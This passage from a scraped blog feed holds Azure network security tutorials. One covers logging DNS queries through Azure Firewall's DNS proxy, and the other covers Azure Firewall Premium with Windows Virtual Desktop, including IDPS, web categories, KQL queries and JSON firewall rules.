the logs.</LI> <LI>Select&nbsp;<STRONG>Send to Log Analytics</STRONG>&nbsp;to configure your workspace.</LI> <LI>Select your subscription.</LI> <LI>Select&nbsp;<STRONG>Save</STRONG>.</LI> </OL> <H2>&nbsp;</H2> <H2><FONT color="#003366">Configure Azure Firewall as a DNS server</FONT></H2> <P>You can configure DNS server settings directly on the Network interface of virtual machine or you can specify directly at Virtual network. Below you can see both the methods.</P> <P>&nbsp;</P> <P><EM>Configure Azure Firewall as DNS server on your Workload Virtual Machine</EM></P> <OL> <LI>In the Azure portal, Select the Workload Virtual Machine.</LI> <LI>Under&nbsp;<STRONG>Settings</STRONG>, select&nbsp;<STRONG>Networking</STRONG>.</LI> <LI>The <STRONG>Networking </STRONG>page, click on <STRONG>Network Interface.</STRONG></LI> <LI>This will open up the<STRONG> Network Interface </STRONG>page, under<STRONG> Settings, </STRONG>Select <STRONG>DNS servers.</STRONG></LI> <LI>In<STRONG> DNS Server </STRONG>Page, Select<STRONG> Custom </STRONG>and enter the internal IP of the Azure Firewall.</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-330px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_9-1614014094904.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256540i8B15239F97A4F63F/image-size/medium?v=v2&amp;px=400" role="button" title="Ashish_Kapila_9-1614014094904.png" alt="Ashish_Kapila_9-1614014094904.png" /></span></P> <P>&nbsp;</P> <P><EM>Configure Azure Firewall as DNS Server directly on the Virtual network</EM></P> <P>&nbsp;</P> <OL> <LI>In the search box at the top of the portal, enter&nbsp;virtual networks&nbsp;in the search box. When&nbsp;Virtual networks&nbsp;appear in the search results, select it.</LI> <LI>From the list of virtual networks, select the virtual network for which you want to change DNS servers for.</LI> <LI>Select&nbsp;DNS servers, under&nbsp;SETTINGS. Select<STRONG> Custom </STRONG>and enter the internal IP of the Azure Firewall.</LI> </OL> <P class="lia-indent-padding-left-300px">&nbsp;<span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Ashish_Kapila_10-1614014094917.png" style="width: 356px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256541i9AB5999977C18D79/image-dimensions/356x216?v=v2" width="356" height="216" role="button" title="Ashish_Kapila_10-1614014094917.png" alt="Ashish_Kapila_10-1614014094917.png" /></span></P> <P>&nbsp;</P> <P>Now, we are all set up and will quickly review how azure firewall provides us the visibility of DNS logs from our Azure infrastructure going to Azure Provided DNS.</P> <P>&nbsp;</P> <OL> <LI>Azure Firewall is set up and using its default Custom DNS configuration, which is Azure DNS.</LI> <LI>Azure Firewall is now configured as DNS proxy and acts as a DNS server for our workload VM.</LI> <LI>Workload VM is configured to use Azure Firewall as a DNS server.</LI> <LI>Azure Firewall Diagnostic settings are configured and logging to Log analytics workspace.</LI> </OL> <P>&nbsp;</P> <P>Connect to your workload client and access internet.</P> <OL> <LI>RDP to your workload Virtual machine.</LI> <LI>Open browser and browse to <A href="#" target="_blank" rel="noopener">www.google.com</A></LI> </OL> <P>&nbsp;</P> <H2>Azure Firewall DNS log fields with explanations</H2> <P>Format: {remote}:{port} - {id} {type} {class} {name} {protocol} {size} {do} {bufsize} {rcode} {rflags} {rsize} {duration}</P> <P>&nbsp;</P> <P>{remote}: client’s IP address, for IPv6 addresses these are enclosed in brackets: [::1]</P> <P>{port}: client’s port</P> <P>{id}: query ID</P> <P>{type}: type of the request</P> <P>{class}: class of the request</P> <P>{name}: name of the request</P> <P>{protocol}: protocol used (tcp or udp)</P> <P>{size}: request size in bytes</P> <P>{do}: is the EDNS0 DO (DNSSEC OK) bit set in the query</P> <P>{bufsize}: the EDNS0 buffer size advertised in the query</P> <P>{rcode}: response CODE</P> <P>{rflags}: response flags, each set flag will be displayed, e.g. “aa, tc”. This includes the qr bit as well</P> <P>{rsize}: response size</P> <P>{duration}: response duration</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>Check the Azure Firewall DNS logs</EM></P> <P>&nbsp;</P> <OL> <LI>In the Azure portal, Select the Azure firewall.</LI> <LI>Under&nbsp;<STRONG>Monitoring</STRONG>, select&nbsp;<STRONG>Diagnostic settings.</STRONG></LI> <LI>In <STRONG>Diagnostics settings</STRONG> page, Click on <STRONG>workspace name</STRONG> under <STRONG>Log Analytics Workspace</STRONG> which will open the Log analytics workspace blade for you.</LI> <LI>In the left Menu, select <STRONG>logs</STRONG> and copy/paste the following query and click on <STRONG>Run.</STRONG></LI> </OL> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="sql">AzureDiagnostics |&nbsp;where&nbsp;Category&nbsp;==&nbsp;"AzureFirewallDnsProxy" |&nbsp;parse&nbsp;msg_s&nbsp;with&nbsp;"DNS&nbsp;Request:&nbsp;"&nbsp;ClientIP&nbsp;":"&nbsp;ClientPort&nbsp;"&nbsp;-&nbsp;"&nbsp;QueryID&nbsp;"&nbsp;"&nbsp;Request_Type&nbsp;"&nbsp;"&nbsp;Request_Class&nbsp;"&nbsp;"&nbsp;Request_Name&nbsp;".&nbsp;"&nbsp;Request_Protocol&nbsp;"&nbsp;"&nbsp;Request_Size&nbsp;"&nbsp;"&nbsp;EDNSO_DO&nbsp;"&nbsp;"&nbsp;EDNS0_Buffersize&nbsp;"&nbsp;"&nbsp;Responce_Code&nbsp;"&nbsp;"&nbsp;Responce_Flags&nbsp;"&nbsp;"&nbsp;Responce_Size&nbsp;"&nbsp;"&nbsp;Response_Duration |&nbsp;project-away&nbsp;msg_s |&nbsp;summarize&nbsp;by&nbsp;TimeGenerated,&nbsp;ResourceId,&nbsp;ClientIP,&nbsp;ClientPort,&nbsp;QueryID,&nbsp;Request_Type,&nbsp;Request_Class,&nbsp;Request_Name,&nbsp;Request_Protocol,&nbsp;Request_Size,&nbsp;EDNSO_DO,&nbsp;EDNS0_Buffersize,&nbsp;Responce_Code,&nbsp;Responce_Flags,&nbsp;Responce_Size,&nbsp;Response_Duration,&nbsp;SubscriptionId</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <OL start="5"> <LI>You will see an output like the one below and can see all the DNS queries your workload VM is making to Azure provided DNS.</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ashish_Kapila_11-1614014094927.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/256542i02E6B4E6983F465B/image-size/large?v=v2&amp;px=999" role="button" title="Ashish_Kapila_11-1614014094927.png" alt="Ashish_Kapila_11-1614014094927.png" /></span></P> <P>&nbsp;</P> <P>As you can see that now your organization has visibility into all the DNS requests which your Azure Infrastructure is making to Azure Provided DNS and how you can utilize Azure Firewall to control traffic flows.<BR />You can also use this <A title="Firewall as DNS Proxy in Hub and Spoke topology" href="#" target="_self">template in Github</A>&nbsp;to deploy&nbsp;Azure Firewall as a DNS Proxy in a Hub and Spoke topology along with Private Endpoints<BR />We hope you find this blog useful.<BR /><BR />Thanks to&nbsp;Paolo Salvatori for providing the template for the <A href="#" target="_self">ARM deployment</A>&nbsp;.</P> Tue, 27 Apr 2021 17:14:38 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331 Ashish_Kapila 2021-04-27T17:14:38Z How to use Azure Firewall Premium with WVD https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402 <P>Azure Firewall Premium is now in Public Preview and offers many new and powerful capabilities that can be used in your Windows Virtual Desktop environment. Several of these capabilities are Intrusion Detection and Prevention System (IDPS) and Web Categories. You can learn more about these capabilities and how they protect Windows Virtual Desktop environments plus some sample application and network rules and their anatomy in this post.</P> <P>&nbsp;</P> <P>Assets created in this article can be <A href="#" target="_self">found here:</A></P> <P>&nbsp;</P> <P>If you would like to test along check out the <A href="#" target="_blank" rel="noopener">instructions on how to deploy Azure Firewall premium</A>. Be sure to take in consideration the WVD Virtual network and that there is dedicated subnet for Azure Firewall. The minimum IP address space in CIDR notation needed is /26 for the dedicated Azure Firewall subnet. The subnet must also be named <STRONG><EM>AzureFirewallSubnet</EM></STRONG> .Below is a sample template I use in pilots using a single Virtual Network with multiple subnets and segmentation for Windows Virtual Desktop.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="2021-02-19_1-28-28.png" style="width: 824px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255954i03498BFE531F857C/image-size/large?v=v2&amp;px=999" role="button" title="2021-02-19_1-28-28.png" alt="2021-02-19_1-28-28.png" /></span></P> <P>&nbsp;</P> <P>After Azure Firewall Premium is deployed be sure to create a User Defined Route by creating a Route Table in Azure</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture3.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255955i8740ADDE20C4FAA3/image-size/large?v=v2&amp;px=999" role="button" title="Picture3.png" alt="Picture3.png" /></span></P> <P>&nbsp;</P> <P>Once created go to the route table and add a route.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture4.png" style="width: 585px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255956i4BBAEC46CF880445/image-size/large?v=v2&amp;px=999" role="button" title="Picture4.png" alt="Picture4.png" /></span></P> <P>&nbsp;</P> <P>When adding the route you can in testing add a quad zero route of 0.0.0.0/0 which will steer all public traffic public to a next hop address of the Azure Firewall Premium private IP address.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture5.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255957i6C768E585A3EF0B2/image-size/large?v=v2&amp;px=999" role="button" title="Picture5.png" alt="Picture5.png" /></span></P> <P>&nbsp;</P> <P>If you have additional VNETs or Subnets for testing, add more granular routes xx.xx.xx.xx/yy to each Azure private IP address space that needs to pass to the Azure Firewall, be sure to include next hop address of the Azure Firewall Premium private IP address.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture6.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255958i2AEB1D67167F3B56/image-size/large?v=v2&amp;px=999" role="button" title="Picture6.png" alt="Picture6.png" /></span></P> <P>&nbsp;</P> <P>Once added we can associate the route to the Windows Virtual Desktop subnet. Once associated the traffic will flow to Azure Firewall Premium as next hop.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture7.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255959i4F287C23F1BE6A9D/image-size/large?v=v2&amp;px=999" role="button" title="Picture7.png" alt="Picture7.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Intrusion Detection and Prevention System (IDPS)</STRONG></P> <P>&nbsp;</P> <P>Azure Firewall Premium now brings Intrusion Detection and Prevention System (IDPS) to your virtual network and Windows Virtual Desktop Host Pool internet bound communications. IDPS is a great feature to use as you may allow some openness to your Internet bound traffic within Windows Virtual Desktop. As employees surf the web or execute programs, IDPS can scan each network connection against its rules and then Audit or Audit and Deny traffic based on signature matches.</P> <P>&nbsp;</P> <P>To turn on this feature with Azure Firewall policy applied to it, you will find a new blade for IDPS (preview). Please note this will only work for Azure Firewall premium. In addition, be sure to <A href="#" target="_blank" rel="noopener">review configuring your Azure Firewall policies</A> to use KeyVault and certificates to do TLS inspection, this will greatly enhance IDPS.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture8.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255960i0E91399F833EE973/image-size/large?v=v2&amp;px=999" role="button" title="Picture8.png" alt="Picture8.png" /></span></P> <P>&nbsp;</P> <P>Once turned on you will want to send the Azure Firewall Diagnostic traffic to Log Analytics or your SIEM of choice. This is because it will help record the Signatures discovered that were audited or denied in IDPS so you can use Signature Rules.</P> <P>&nbsp;</P> <P>You can set this up by going to the Azure Firewall resource and to the Diagnostic Settings blade and Add Diagnostic Settings.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture9.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255961iBE64F4B7A9379A5F/image-size/large?v=v2&amp;px=999" role="button" title="Picture9.png" alt="Picture9.png" /></span></P> <P>&nbsp;</P> <P>Then define and send the logs to Log Analytics workspace</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture10.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255962iD0F63A4B447E4B2F/image-size/large?v=v2&amp;px=999" role="button" title="Picture10.png" alt="Picture10.png" /></span></P> <P>&nbsp;</P> <P>Within Log Analytics you can use the following Query to look at the traffic that was alerted or alerted and denied on with IDPS, including the signature in the event you need to tweak the Signature to allow or deny.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="yaml">AzureDiagnostics | where TimeGenerated &gt;= ago(90d) | where Category == "AzureFirewallNetworkRule" | where OperationName == "AzureFirewallIDSLog" | parse msg_s with * "TCP request from " Source " to " Destination ". Action: " ActionTaken ". Rule: " IDPSSig ". IDS: " IDSMessage ". Priority: " Priority ". Classification: " Classification | project TimeGenerated, Source, Destination, ActionTaken, IDPSSig, IDSMessage, Priority, Classification</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture11.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255963iDDE6BADD3F705034/image-size/large?v=v2&amp;px=999" role="button" title="Picture11.png" alt="Picture11.png" /></span></P> <P>&nbsp;</P> <P>Once you have a signature, you can use this in Azure Firewall polies and IDPS (Preview) blade further to help with over riding the default mode you set IDPS on earlier via the signatures. This can help with false positives if Deny is default for IDPS mode or for adding to blocklists you generate in a permissive Alert Only IDPS mode</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture12.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255964iD6C1E5DD5926352E/image-size/large?v=v2&amp;px=999" role="button" title="Picture12.png" alt="Picture12.png" /></span></P> <P>&nbsp;</P> <P>Finally if you need certain WVD Host Pool Members or other Components of the architecture to bypass IDPS all together you can set this within the Bypass list. You may have a WVD Host Pool that includes a legacy application that does not have methods of supporting certificates from the Azure Firewall. Most modern applications and web browsers support this but if you do encounter one you can use this bypass list. The Bypass list allows a 5 tuple network rule configuration. Once configured the servers originating traffic will no longer pass through IDPS.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture13.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255965i598A461AA4320277/image-size/large?v=v2&amp;px=999" role="button" title="Picture13.png" alt="Picture13.png" /></span></P> <P>&nbsp;</P> <P><STRONG>Web Categories</STRONG></P> <P>&nbsp;</P> <P>Another approach is to use web categories to deny or allow traffic based on website characteristics like social media sites or gambling websites as an example. There are 64 web categories across differing classifications for selection. This is certainly appealing to block or allow web content to your employees utilizing their Windows 10 interface to the Internet through Windows Virtual Desktop. Below is an example of creating a rule collection and using web categories to deny traffic from Windows Virtual Desktop host pools. An even interesting feature is if you were to block News for instance under Azure Firewall premium a URL like <A href="#" target="_blank" rel="noopener">www.google.com/news</A> would be blocked under the web category so it extends beyond the FQDN and into the URL path.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture14.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255966i9B51B124689C3D1F/image-size/large?v=v2&amp;px=999" role="button" title="Picture14.png" alt="Picture14.png" /></span></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture15.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255967i9C359CA32F502B39/image-size/large?v=v2&amp;px=999" role="button" title="Picture15.png" alt="Picture15.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "ApplicationRule", "name": "AllowNews", "protocols": [ { "protocolType": "Https", "port": 443 } ], "webCategories": [ "business", "webbasedemail" ], "sourceAddresses": [ "*" ], "terminateTLS": true }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Anatomy of a Firewall Rule Collection</STRONG></P> <P>&nbsp;</P> <P>When using Azure Firewall to protect your Windows Virtual Desktop host pools, there are special rules that have to be implemented beyond the Windows Virtual Desktop tag to allow for the host pools to communicate properly with the Host Traffic. The needed WVD rules are <A href="#" target="_blank" rel="noopener">outlined here</A> but you can use the rules as an example to walkthrough the anatomy of Azure Firewall rule as code.</P> <P>&nbsp;</P> <P>One of the capabilities of Azure Firewall is configuration as code, in particular ARM Template code in Declarative JSON. As an example you will walk through the firewall rule as code.</P> <P>&nbsp;</P> <P>You will need a couple rule collections to allow traffic for the Windows Virtual Desktop host pools to communicate outbound to the management plane. &nbsp;A rule collection code is very simple, it allows you to define a collection of rules for the Azure Firewall, the priority they will take, the action of allowing or denying traffic in those rules and the rules themselves. An example below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "name": "AllowAdditionalWVDApp", "priority": 203, "ruleCollectionType": "FirewallPolicyFilterRuleCollection", "action": { "type": "Allow" }, "rules": [] }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>In the next section you will want to define those rules that fit within the collection.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture16.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255968i81BABF04E26BB0FD/image-size/large?v=v2&amp;px=999" role="button" title="Picture16.png" alt="Picture16.png" /></span></P> <P>&nbsp;</P> <P>According to the Azure documentation you will use an Application rule and a FQDN tag. The following rule code fits into the rule collection code “rules”: […]</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "ApplicationRule", "name": "AllowWVDTag", "protocols":[ { "protocolType":"Https", "port":443 }, ], "fqdnTags": [ "WindowsVirtualDesktop" ], "targetFqdns": [], "sourceAddresses":[ "XX.XX.XX.XX/YY" ], "sourceIpGroups": [], "terminateTLS":false },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddress”: [ xx.xx.xx.xx/yy ] is the Network CIDR range of the subnet where your Azure Virtual Desktop host pools are located in.</EM></P> <P>&nbsp;</P> <P>This rule will allow HTTPS traffic from the Windows Virtual Desktop host pool VMs to communicate with the management plane of WVD via the Tag.</P> <P>&nbsp;</P> <P>You need to add some additional rules as well into the rule collection set, these allow the Windows Virtual Desktop host pool VMs to communicate with the data plane of WVD.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture17.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255971i04F3DBC3BF24C9A2/image-size/large?v=v2&amp;px=999" role="button" title="Picture17.png" alt="Picture17.png" /></span></P> <P>&nbsp;</P> <P>According to the documentation, the data plane of the WVD can be unique per instance. The first example may be a bit too wide open for your security posture and risk. In order to have more restrictive rules that are granular to only allow specific access to the data plane of WVD; the documentation provides you with a KQL query you can run against the Azure Firewall’s diagnostic logs.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="yaml">AzureDiagnostics | where Category == "AzureFirewallApplicationRule" | search "Deny" | search "gsm*eh.servicebus.windows.net" or "gsm*xt.blob.core.windows.net" or "gsm*xt.table.core.windows.net" or "gsm*xt.queue.core.windows.net" | parse msg_s with Protocol " request from " SourceIP ":" SourcePort:int " to " FQDN ":" * | project TimeGenerated,Protocol,FQDN</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Another method to find these specific FQDNs of the WVD data layer can also be found on the Host Pool VM themselves in the Event Viewer. Many thanks to Eric Moore who discovered this technique. This can be useful if you are putting in an Azure Firewall into an existing WVD host pool to prevent interruption.</P> <P>&nbsp;</P> <P>On the WVD Host Pool VM Open <STRONG>Event Viewer,</STRONG> go to <STRONG>Windows Logs</STRONG> and <STRONG>Application</STRONG></P> <P>&nbsp;</P> <P>Filter on<STRONG> Source: WVD-Agent </STRONG>and<STRONG> Event ID: 3701</STRONG></P> <P>&nbsp;</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture18.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255972i25D65FFC66564D1F/image-size/large?v=v2&amp;px=999" role="button" title="Picture18.png" alt="Picture18.png" /></span></STRONG></P> <P>&nbsp;</P> <P>Scroll through the events until you come across one that exposes a larger list more then 4 FQDNs</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture19.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255973iF880FF641F8167BE/image-size/large?v=v2&amp;px=999" role="button" title="Picture19.png" alt="Picture19.png" /></span></P> <P>&nbsp;</P> <P>Now that you have obtained the FQDNs unique to your WVD instances you can create additional Application Rules to allow the Windows Virtual Desktop host pools to communicate on the data access layer. The WVD Data access layer consists of unique Azure Service Bus, Storage Accounts blobs, tables, and queues.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "ApplicationRule", "name": "AllowWVDServicebus", "protocols":[ { "protocolType":"Https", "port":443 } ], "targetUrls":[ "gsm1860291218eh.servicebus.windows.net/*", "gsm1402610616eh.servicebus.windows.net/*", "gsm2121010078eh.servicebus.windows.net/*", "gsm2076831083eh.servicebus.windows.net/*" ], "sourceAddresses":[ "XX.XX.XX.XX/YY" ], "terminateTLS":true }, { "ruleType": "ApplicationRule", "name": "AllowWVDBlob", "protocols":[ { "protocolType":"Https", "port":443 } ], "targetUrls":[ "gsm1860291218xt.blob.core.windows.net/*", "gsm1402610616xt.blob.core.windows.net/*,", "gsm2121010078xt.blob.core.windows.net/*", "gsm2076831083xt.blob.core.windows.net/*" ], "sourceAddresses":[ "XX.XX.XX.XX/YY" ], "terminateTLS":true }, { "ruleType": "ApplicationRule", "name": "AllowWVDTable", "protocols":[ { "protocolType":"Https", "port":443 } ], "targetUrls":[ "gsm1860291218xt.table.core.windows.net/*", "gsm1402610616xt.table.core.windows.net/*", "gsm2121010078xt.table.core.windows.net/*", "gsm2076831083xt.table.core.windows.net/*" ], "sourceAddresses":[ "XX.XX.XX.XX/YY" ], "terminateTLS":true }, { "ruleType": "ApplicationRule", "name": "AllowWVDQueue", "protocols":[ { "protocolType":"Https", "port":443 } ], "targetUrls":[ "gsm1860291218xt.queue.core.windows.net/*", "gsm1402610616xt.queue.core.windows.net/*", "gsm2121010078xt.queue.core.windows.net/*", "gsm2076831083xt.queue.core.windows.net/*" ], "sourceAddresses":[ "XX.XX.XX.XX/YY" ], "terminateTLS":true },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddress”: [ xx.xx.xx.xx/yy ] is the Network CIDR rage of the subnet where your Azure Virtual Desktop host pools are located in.</EM></P> <P>&nbsp;</P> <P>This rule will allow HTTPS traffic from the Windows Virtual Desktop host pool VMs to communicate with the unique data plane of WVD.</P> <P>&nbsp;</P> <P>Be sure to <A href="#" target="_blank" rel="noopener">review configuring your Azure Firewall policies</A> to use KeyVault and certificates to do TLS inspection, this will allow the use of the URL / within the application rules.</P> <P>&nbsp;</P> <P>The rules above are reflected in the Azure Portal within the Firewall Policy under Application Rules</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture20.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255974i6025D225B0C4AA20/image-size/large?v=v2&amp;px=999" role="button" title="Picture20.png" alt="Picture20.png" /></span></P> <P>&nbsp;</P> <P>You will now create a new rule collection set for the Network based rules to allow certain traffic from the Windows Virtual Desktop host pools.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "name": "AllowAdditionalWVDNetwork", "priority": 103, "ruleCollectionType": "FirewallPolicyFilterRuleCollection", "action": { "type": "Allow" }, "rules": [...] }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Azure documentation states the following for Network based rules</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture21.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255975i8FCA6C1EAD368E9F/image-size/large?v=v2&amp;px=999" role="button" title="Picture21.png" alt="Picture21.png" /></span></P> <P>&nbsp;</P> <P>Those rules will look like the following in code between the rule collection code “rules”: […]</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowADDNS", "ipProtocols": [ "TCP", "UDP" ], "sourceAddresses": [ "XX.XX.XX.XX/YY" ], "destinationAddresses": [ "ZZ.ZZ.ZZ.ZZ" ], "sourceIpGroups": [], "destinationIpGroups": [], "destinationFqdns": [], "destinationPorts": [ "53" ] },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM>“sourceAddress”: [ xx.xx.xx.xx/yy ] is the Network CIDR range of the subnet where your Azure Virtual Desktop host pools are located in.</EM></P> <P>&nbsp;</P> <P>This first network rule in the ruleset Allows the WVD Host Pools to communicate TCP 53 with Local AD DNS servers. ZZ.ZZ.ZZ.ZZ is the AD DNS Server(s). Note if you are restrictive in the communication between Host Pool and Active Directory Domain Services subnet, you may want to also open additional ports <A href="#" target="_blank" rel="noopener">outlined here</A> for Active Directory.</P> <P>&nbsp;</P> <P>An example of the next rule is below</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowAzureKMS", "ipProtocols": [ "TCP" ], "sourceAddresses": [ "XX.XX.XX.XX/YY" ], "destinationAddresses": [], "sourceIpGroups": [], "destinationIpGroups": [], "destinationFqdns": [ "kms.core.windows.net" ], "destinationPorts": [ "1688" ] },</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The second network rule is allowing the WVD Host Pools to communicate with the Azure KMS service. What is interesting here is the use of a FQDN in a Network Rule rather than an IP address for destination. A couple months back Azure Firewall introduced this capability which allows the <A href="#" target="_blank" rel="noopener">Azure Firewall to Leverage Azure DNS or a Custom DNS</A> to lookup answers for the network rule. This can simplify a lot of rules now since many Azure services or Microsoft Services or 3<SUP>rd</SUP> party cloud services have a FQDN service that’s IP addresses can change from time to time.</P> <P>&nbsp;</P> <P>If you are using a Network rule like this with FQDN, please take note you need to update the Azure Firewall to utilize FQDNs in network rules, the <A href="#" target="_blank" rel="noopener">following article goes into more detail</A>.</P> <P>&nbsp;</P> <P>The ARM template and Infrastructure as code looks like this under the resource Microsoft.Network/firewallPolicies</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">"properties": { "threatIntelMode": "Alert", "dnsSettings": { "servers": [] }, "transportSecurity": { "certificateAuthority": { "name": "cacert" } } }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>In the Azure portal if you go to the Azure Firewall policy and under Setting &gt; DNS the equivalent configuration.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture22.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255976i41A45CE2B398F9B3/image-size/large?v=v2&amp;px=999" role="button" title="Picture22.png" alt="Picture22.png" /></span></P> <P>&nbsp;</P> <P>A final network rule will allow the WVD host pool communicate with NTP servers using the FQDN as a destination.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "ruleType": "NetworkRule", "name": "AllowWindowsNTP", "ipProtocols": [ "UDP" ], "sourceAddresses": [ "*" ], "destinationAddresses": [], "sourceIpGroups": [], "destinationIpGroups": [], "destinationFqdns": [ "time.windows.com" ], "destinationPorts": [ "123" ] }</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>The rules above are reflected in the Azure Portal within the Firewall Policy under Network Rules</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Picture23.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/255977i811002707134F808/image-size/large?v=v2&amp;px=999" role="button" title="Picture23.png" alt="Picture23.png" /></span></P> <P>&nbsp;</P> <P>All of the rule collections and application and network rules discussed here can also be found on Azure Network Security GitHub repo as a <A href="#" target="_blank" rel="noopener">deployable Azure Fw Policy</A>. There will be continuing improvement on the WVD Azure Firewall Policy sample to include the Active Directory, Azure NetApp, and Office 365 Allow Rules. For now the deployable sample will include the items discussed in the Azure documentation.</P> <P>&nbsp;</P> <P>In this post you learned how to use the new features of Azure Firewall premium with Windows Virtual Desktop. Features like IDPS and Web Categories which enhance your security posture for Windows Virtual Desktop. You also learned some examples of Application and Network rules for Windows Virtual Desktop.</P> <P>&nbsp;</P> <P>Be sure to check out other examples at <A href="#" target="_blank" rel="noopener">Azure Network Security GitHub</A> and if interested please upload your Azure Firewall Sample patterns here as well via a pull request.</P> <P>&nbsp;</P> <P><STRONG>Special thanks 